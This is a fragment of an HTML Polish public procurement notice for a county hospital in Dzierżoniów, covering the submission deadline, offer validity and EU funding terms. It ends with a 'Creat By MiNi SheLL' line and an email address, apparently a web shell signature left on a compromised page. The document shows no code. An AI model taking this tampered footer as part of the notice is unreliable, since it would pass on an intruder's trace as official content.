<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pow.dzierzoniow.pl/pl/bip/jednostki_organizacyjne/sluzba_zdrowia/spspwd/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> NZOZ Szpital Powiatowy w Dzierżoniowie sp. z o.o. ul. Cicha 1 58-200 Dzierżoniów Zamówienia Publiczne..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2016 godzina 10:30, miejsce: NZOZ Szpital Powiatowy w Dzierżoniowie sp. z o.o. ul. Cicha 1 58-200 Dzierżoniów Sekretariat Spółki..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com